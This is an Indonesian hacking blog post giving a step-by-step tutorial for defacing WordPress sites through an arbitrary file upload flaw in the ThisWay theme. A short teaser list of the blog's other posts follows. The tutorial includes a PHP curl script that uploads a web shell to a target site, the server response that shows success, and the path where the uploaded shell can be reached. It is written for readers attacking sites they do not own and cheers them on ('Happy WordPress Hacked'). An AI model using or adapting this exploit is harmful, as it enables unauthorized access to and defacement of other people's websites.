Skip to main content

Tutorial Deface dengan WordPress ThisWay Arbitrary File Upload


Hallo Fans ,Nuenomaru disini .-.
maaf baru bisa posting/share artikel tutorial lagi
lg sibuk urus masadepan *asiikk wkwkwk
untuk artikel hari ini saya akan share salah satu bug/celah web berCMS Wordpress
kali ini Nue akan share Exploit Tutorial deface dengan WordPress ThisWay Arbitrary File Upload,  etthoo,, ini exploit gak begitu baru loh .. *exploit lama wkwk

hahaha iseng2 aja share kali aja masih crotz

bahan bahan:
- PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface
- Kopi , sabun , Lilin (hukumnya sunah wkwkw :v ) 


Langsung intip Tutorialnya

#- Title: WordPress ThisWay Arbitrary File Upload
#- Author: Bet0
#- Date: 11/01/2013  
#- Vendor: themeforest.net
#- Download Link: www.mafiashare.net/download/themeforest-this-way-v12-wp-full-video-image-background/
#- Tested on : Windows 7
=============


Pertama Dork Pikir sendiri Mz :v xixihi

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.
exploit: /wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php

3. Vuln = {"status":"NOK","ERR":"This file is incorect"} atau Blank

*kurang lebih sih gituh wkwkwk *maaf kalo salah hehehe



4. Buat File Baru Berekstensi .php Contoh thisway.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn thisway.php tadi

<?php
$uploadfile="namashellente.php";
$ch = curl_init("target.crotz/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>


5. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
6. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php

7. jika sukses , akan muncul nama shell sobat di CMD (berupa random shell.php gitu deh) dan akan keluar lengkap link akses shell ente

{"status":"OK","imageID":12,"imageName":"settingimage_namarandomshellentenanti.php"}





8. Shell Akses: www.target.crotz/wp-content/uploads/thn/bln/settingsimage_randomnamashellente.php


done


bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Happy WordPress Hacked !!

Sekian dan semoga bermanfaat .. terimakasih



source and thanks to: 3XPLOI7 Bug





./Nuenomaru























Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Comments

Popular posts from this blog

How to install CUCM 8.0.2 on Vmware | Call Manager Installation Guide

CUCM is a software-based call-processing component which serves as the main engine for Cisco VOIP infrastructure. This article can be used as a reference for your CUCM installation, This article can be used for any version of CUCM like 8.0, 8.6, 9.1 or 10.5. Let's jump to the installation directly. Make sure you have.. Before we begin, I want to make sure that you have the below softwares installed in your machine. Vmware Workstation Bootable Cisco Unified Call Manager ISO File GNS3 (Optional) - To Configure NTP Server A minimum of 2GB RAM and 80 GB HDD for Virtual Machine At this stage I assume that you have both Vmware Workstation and GNS3 installed. During installation you will be prompted to enter NTP server details. Follow the below steps to make a router to act as a NTP server in GNS3. Open ncpa.cpl from Run window. Find a Vmware network adapter. Double click the adapter and configure a private range IP, for example 120.0.0.1. Next open GNS3, Put a router and take console. Pa...

6 Url Shorteners Yang Menghasilkan Uang Selain AdF.ly

Salam sobat GBX nah di pertemuan kita kali ini ane akan membahas 6 Url Shorteners Yang Menghasilkan Uang Selain AdF.ly seperti yang anda tau adf.ly adalah url shortener terbaik yang membayar kita karena telah menggunakan jasannya, tapi selain adf.ly ternyata masih banyak lagi Url Shorteners Yang Menghasilkan Uang, sekarang kita lihat saja ulasan di bawah.  6 Url Shorteners Yang Menghasilkan Uang Selain AdF.ly 1. Adfly adf.ly Yup yang ini memang patut diletakkan di peringkat satu ya, Adfly sudah ada dan terpercaya sejak bertahu-tahun lalu dan sudah menjadi pemendek link / url terbaik selama ini.  Selain menyediakan fasilitas penyingkat url, adfly juga merupakan situs penghasil dollar yang sudah sangat terkenal (melalui Pay Per Click dan Referal). Banyak juga teman-teman di internet yang sudah sukses mendapatkan dollar lho. (adfly ini sudah terpercaya dan ya semoga terus aman begitu dech). Komisi yang telah anda dapatkan dari adfly ini bisa langsung di transfer ke pay...

Ethical Hacking - Cisco HSRP with Kali linux - Example Demonstration and Security precautions

The Hot Swappable Router Protocol (HSRP) is a way to build redundancy into your network by allowing two or more routers to continuously test each other for connectivity, and take over if a router fails.As multiple routers can participate in the HSRP group, there has to be an election to determine who's the primary router. This HSRP election is based on a priority value (0 to 255) that is configured on each router in the group. By default, the priority is 100. The router with the highest priority value (255 is highest) becomes the active router for the group. If all router priorities are equal or set to the default value, the router with the highest IP address on the HSRP interface becomes the active router. In this post, we are going to make our Kali machine a HSRP participant and to become the active router by setting the highest priority to it. Yersinia tool (in built in Kali) helps us to perform this test with ease. For more information on HSRP, please refer  RFC 2281 Yersinia Y...